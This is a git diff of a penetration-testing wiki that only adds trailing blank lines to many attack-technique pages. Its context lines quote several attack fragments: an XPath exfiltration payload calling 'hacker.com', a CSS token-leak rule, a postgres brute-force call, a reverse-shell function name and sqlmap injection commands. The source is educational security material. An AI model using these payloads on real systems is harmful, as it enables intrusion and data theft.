--- a/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md
@@ -111,3 +111,4 @@ SELECT testfunc();
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
index 1156e4cf7..a761296e4 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
@@ -121,3 +121,4 @@ select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 7ecec13b0..a671e3d11 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -353,3 +353,4 @@ print(" drop function connect_back(text, integer);")
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
index aaa76de09..d6cae5dfb 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
@@ -324,3 +324,4 @@ rce-with-postgresql-extensions.md
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 8dc1431db..4d1ee6aa7 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -193,3 +193,4 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index f5691a31d..c4cec1e2d 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -225,3 +225,4 @@ Remember that **you can create your own tamper in python** and it's very simple.
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index 2c9a66bf0..16957afc2 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -79,3 +79,4 @@ sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 8cc05227b..834ebe83d 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -382,3 +382,4 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 626416241..7cdb561ae 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -659,3 +659,4 @@ Rancher's metadata can be accessed using:
 {{#include ../../banners/hacktricks-training.md}}
+
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
index 1f44877b4..522ebdfa4 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@@ -7,3 +7,4 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 0bcfbdc5d..79b63fe79 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -223,3 +223,4 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing- {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index 42234bab3..dc06dcbe5 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -1108,3 +1108,4 @@ If you think it could be useful, read: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index 8d8de12d6..3388d54a9 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/src/pentesting-web/ssti-server-side-template-injection/el-expression-language.md @@ -250,3 +250,4 @@ Check [https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/](https://h1pm {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index ab945c4f6..fa32d8506 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md 
@@ -363,3 +363,4 @@ The request will be urlencoded by default according to the HTTP format, which ca {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/timing-attacks.md b/src/pentesting-web/timing-attacks.md index a89b332be..049d28ca8 100644 --- a/src/pentesting-web/timing-attacks.md +++ b/src/pentesting-web/timing-attacks.md @@ -39,3 +39,4 @@ Once an scoped open proxy is discovered, it was possible to find valid targets b {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md index f1425a11b..7f88c964d 100644 --- a/src/pentesting-web/unicode-injection/README.md +++ b/src/pentesting-web/unicode-injection/README.md @@ -52,3 +52,4 @@ Emoji lists: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md index 5c63f5e38..365ba43cc 100644 --- a/src/pentesting-web/unicode-injection/unicode-normalization.md +++ b/src/pentesting-web/unicode-injection/unicode-normalization.md @@ -106,3 +106,4 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md index b4e668794..c0a863d1e 100644 --- a/src/pentesting-web/uuid-insecurities.md +++ b/src/pentesting-web/uuid-insecurities.md @@ -65,3 +65,4 @@ Imagine a web application that uses UUID v1 for generating password reset links. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md index 132730fdf..1ebe4fca4 100644 --- a/src/pentesting-web/web-tool-wfuzz.md +++ b/src/pentesting-web/web-tool-wfuzz.md 
@@ -156,3 +156,4 @@ wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -- {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md index 21cd67d8f..acb1a63d8 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology.md +++ b/src/pentesting-web/web-vulnerabilities-methodology.md @@ -131,3 +131,4 @@ These vulnerabilities might help to exploit other vulnerabilities. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md index 3f2b8052e..c4a71d497 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology/README.md +++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md @@ -129,3 +129,4 @@ These vulnerabilities might help to exploit other vulnerabilities. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md index f07643436..bdc090d89 100644 --- a/src/pentesting-web/websocket-attacks.md +++ b/src/pentesting-web/websocket-attacks.md @@ -175,3 +175,4 @@ h2c-smuggling.md {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md index 366df9feb..c14e7b8ba 100644 --- a/src/pentesting-web/xpath-injection.md +++ b/src/pentesting-web/xpath-injection.md @@ -293,3 +293,4 @@ doc-available(concat("http://hacker.com/oob/", RESULTS)) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md index edefc5bd3..4a7babf47 100644 --- a/src/pentesting-web/xs-search.md +++ b/src/pentesting-web/xs-search.md @@ -929,3 +929,4 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs + 
diff --git a/src/pentesting-web/xs-search/README.md b/src/pentesting-web/xs-search/README.md index 4ad910682..673ae67b2 100644 --- a/src/pentesting-web/xs-search/README.md +++ b/src/pentesting-web/xs-search/README.md @@ -931,3 +931,4 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs + diff --git a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md index 7ec736258..9ea18a9a9 100644 --- a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md +++ b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md @@ -117,3 +117,4 @@ Let's see how this exploit work: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/connection-pool-example.md b/src/pentesting-web/xs-search/connection-pool-example.md index 29144d8ec..4e70ac4e7 100644 --- a/src/pentesting-web/xs-search/connection-pool-example.md +++ b/src/pentesting-web/xs-search/connection-pool-example.md @@ -528,3 +528,4 @@ In the exploit you can see: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md index 1be9f7dec..2110ed525 100644 --- a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md +++ b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md @@ -62,3 +62,4 @@ The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/e {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/css-injection/README.md b/src/pentesting-web/xs-search/css-injection/README.md index 4f6533489..53a4f3a29 100644 --- a/src/pentesting-web/xs-search/css-injection/README.md +++ b/src/pentesting-web/xs-search/css-injection/README.md 
@@ -783,3 +783,4 @@ So, if the font does not match, the response time when visiting the bot is expec {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/css-injection/css-injection-code.md b/src/pentesting-web/xs-search/css-injection/css-injection-code.md index 0d4b01211..1e6f0df55 100644 --- a/src/pentesting-web/xs-search/css-injection/css-injection-code.md +++ b/src/pentesting-web/xs-search/css-injection/css-injection-code.md @@ -282,3 +282,4 @@ input[value=]{list-style:url(http://localhost:5001/end?token=&)}; {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md index 4fed2a941..6459c2c7b 100644 --- a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md +++ b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md @@ -156,3 +156,4 @@ Let's check the code: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md index eb5849b07..5785ffcf0 100644 --- a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md +++ b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md @@ -73,3 +73,4 @@ Main page that generates iframes to the previous `/guessing` page to test each p {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md index d948f85e6..0859df7ef 100644 --- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md +++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md @@ -105,3 +105,4 @@ In this challenge the user could sent thousands of chars and if the flag was con {{#include ../../banners/hacktricks-training.md}} + 
diff --git a/src/pentesting-web/xs-search/performance.now-example.md b/src/pentesting-web/xs-search/performance.now-example.md index a2cae506f..3ecaa992f 100644 --- a/src/pentesting-web/xs-search/performance.now-example.md +++ b/src/pentesting-web/xs-search/performance.now-example.md @@ -57,3 +57,4 @@ document.addEventListener("DOMContentLoaded", main) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xs-search/url-max-length-client-side.md b/src/pentesting-web/xs-search/url-max-length-client-side.md index d48ce87ca..1b4697e65 100644 --- a/src/pentesting-web/xs-search/url-max-length-client-side.md +++ b/src/pentesting-web/xs-search/url-max-length-client-side.md @@ -75,3 +75,4 @@ if __name__ == '__main__': {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index b618d205d..dbe25179b 100644 --- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -429,3 +429,4 @@ version="1.0"> {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index f748828e5..86cdd77a6 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -1745,3 +1745,4 @@ other-js-tricks.md {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md index 7d1cf34df..5f245b5d2 100644 --- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md 
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md @@ -109,3 +109,4 @@ For an example of this check the reference link. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md index 5860234e2..debd6a8c8 100644 --- a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md +++ b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md @@ -29,3 +29,4 @@ For further details on bfcache and disk cache, references can be found at [web.d {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md index 1b76c6eb0..6bdb02631 100644 --- a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md +++ b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md @@ -32,3 +32,4 @@ This will **copy the JS file locally** and you will be able to **modify that cop {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md index df1a52d22..7f72b67e7 100644 --- a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md +++ b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md @@ -251,3 +251,4 @@ It's possible to add **new entries inside a form** just by **specifying the `for {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md index f022708c7..f9d87b5b0 100644 --- a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md 
@@ -91,3 +91,4 @@ In the previous image it's possible to see that DOM clobbering scan can be turne {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md index 27b3a385f..dbe0e534d 100644 --- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -328,3 +328,4 @@ dom-clobbering.md {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md index 987c25e9c..364040ea3 100644 --- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md +++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md @@ -167,3 +167,4 @@ Check the following pages: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md index 691ae6f8e..e02d2e4ee 100644 --- a/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md +++ b/src/pentesting-web/xss-cross-site-scripting/integer-overflow.md @@ -11,3 +11,4 @@ Check: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md index 3d0d54ab2..81167d4c0 100644 --- a/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md +++ b/src/pentesting-web/xss-cross-site-scripting/js-hoisting.md @@ -141,3 +141,4 @@ let config;` - {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md index 57606cc8d..6a4bcadb5 100644 --- a/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md 
+++ b/src/pentesting-web/xss-cross-site-scripting/other-js-tricks.md @@ -510,3 +510,4 @@ async function sleep(ms) { {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md index fde93ecd5..64262e4c0 100644 --- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md +++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md @@ -7,3 +7,4 @@ Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**] {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md index b19c23a19..02dc7d2a8 100644 --- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md +++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md @@ -189,3 +189,4 @@ Capturing the **PDF response** with burp should also **show the attachment in cl {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md index 14a5afd4f..069f56925 100644 --- a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md +++ b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md @@ -7,3 +7,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md index dc59fb458..8e8fa406d 100644 --- a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md +++ b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md @@ -13,3 +13,4 @@ {{#include ../../banners/hacktricks-training.md}} + 
diff --git a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md index 3c097f2de..6ba71f2f2 100644 --- a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md +++ b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md @@ -42,3 +42,4 @@ Basically, the attack flow is the following: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md index 171de9b55..8f5fd84a4 100644 --- a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md +++ b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md @@ -220,3 +220,4 @@ window.onmessage = function (e) { {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md index d114bbe95..9ec7f48b6 100644 --- a/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md +++ b/src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md @@ -171,3 +171,4 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xssi-cross-site-script-inclusion.md b/src/pentesting-web/xssi-cross-site-script-inclusion.md index 285fa9dc4..be1114ab2 100644 --- a/src/pentesting-web/xssi-cross-site-script-inclusion.md +++ b/src/pentesting-web/xssi-cross-site-script-inclusion.md @@ -100,3 +100,4 @@ Takeshi Terada's research introduces another form of XSSI, where Non-Script file {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index 2f3ef6829..953454955 100644 
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -781,3 +781,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal {{#include ../banners/hacktricks-training.md}} + diff --git a/src/physical-attacks/escaping-from-gui-applications/README.md b/src/physical-attacks/escaping-from-gui-applications/README.md index ea262760c..e6f28cf61 100644 --- a/src/physical-attacks/escaping-from-gui-applications/README.md +++ b/src/physical-attacks/escaping-from-gui-applications/README.md @@ -276,3 +276,4 @@ These shortcuts are for the visual settings and sound settings, depending on the {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/physical-attacks/firmware-analysis/README.md b/src/physical-attacks/firmware-analysis/README.md index 18c6e59fe..8006e5883 100644 --- a/src/physical-attacks/firmware-analysis/README.md +++ b/src/physical-attacks/firmware-analysis/README.md @@ -254,3 +254,4 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/physical-attacks/firmware-analysis/bootloader-testing.md b/src/physical-attacks/firmware-analysis/bootloader-testing.md index 1f97ce83f..04c704023 100644 --- a/src/physical-attacks/firmware-analysis/bootloader-testing.md +++ b/src/physical-attacks/firmware-analysis/bootloader-testing.md @@ -52,3 +52,4 @@ The following steps are recommended for modifying device startup configurations {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/physical-attacks/firmware-analysis/firmware-integrity.md b/src/physical-attacks/firmware-analysis/firmware-integrity.md index 737b0e2bd..dcacf079e 100644 --- a/src/physical-attacks/firmware-analysis/firmware-integrity.md +++ b/src/physical-attacks/firmware-analysis/firmware-integrity.md 
@@ -35,3 +35,4 @@ If possible, vulnerabilities within startup scripts can be exploited to gain per {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/physical-attacks/physical-attacks.md b/src/physical-attacks/physical-attacks.md index 7833ac84f..1b88255a6 100644 --- a/src/physical-attacks/physical-attacks.md +++ b/src/physical-attacks/physical-attacks.md @@ -57,3 +57,4 @@ A new BitLocker recovery key can be added through social engineering tactics, co {{#include ../banners/hacktricks-training.md}} + diff --git a/src/radio-hacking/README.md b/src/radio-hacking/README.md index 8f95deb47..690b761df 100644 --- a/src/radio-hacking/README.md +++ b/src/radio-hacking/README.md @@ -3,3 +3,4 @@ + diff --git a/src/radio-hacking/low-power-wide-area-network.md b/src/radio-hacking/low-power-wide-area-network.md index 8ed0a5088..20da96512 100644 --- a/src/radio-hacking/low-power-wide-area-network.md +++ b/src/radio-hacking/low-power-wide-area-network.md @@ -16,3 +16,4 @@ Long Range (**LoRa**) it’s popular in multiple countries and has an open sourc {{#include ../banners/hacktricks-training.md}} + diff --git a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md index 9d5ea5114..75d4344cd 100644 --- a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md +++ b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md @@ -71,3 +71,4 @@ sudo bettercap --eval "ble.recon on" {{#include ../banners/hacktricks-training.md}} + diff --git a/src/radio-hacking/pentesting-rfid.md b/src/radio-hacking/pentesting-rfid.md index 90273d6e6..1aa2689c9 100644 --- a/src/radio-hacking/pentesting-rfid.md +++ b/src/radio-hacking/pentesting-rfid.md @@ -99,3 +99,4 @@ Or using the **proxmark**: {{#include ../banners/hacktricks-training.md}} + 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md index 3bec4cf45..a5bc60726 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md @@ -3,3 +3,4 @@ + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index b0bab7933..29ac09bac 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md @@ -25,3 +25,4 @@ More info about One Gadget in: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md index 69fd4c957..8ad519d74 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md @@ -64,3 +64,4 @@ The **Full RELRO** protection is meant to protect agains this kind of technique {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md index 13a6a376a..32d9e186f 100644 
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md @@ -45,3 +45,4 @@ Note that this **won't** **create** an **eternal loop** because when you get bac {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md index b94a44b17..92d0f8448 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md @@ -35,3 +35,4 @@ This command loads the executable and the core file into GDB, allowing you to in {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md index cd5ed7b90..742ba8800 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md @@ -175,3 +175,4 @@ Try to bypass ASLR abusing addresses inside the stack: {{#include ../../../../banners/hacktricks-training.md}} + diff --git 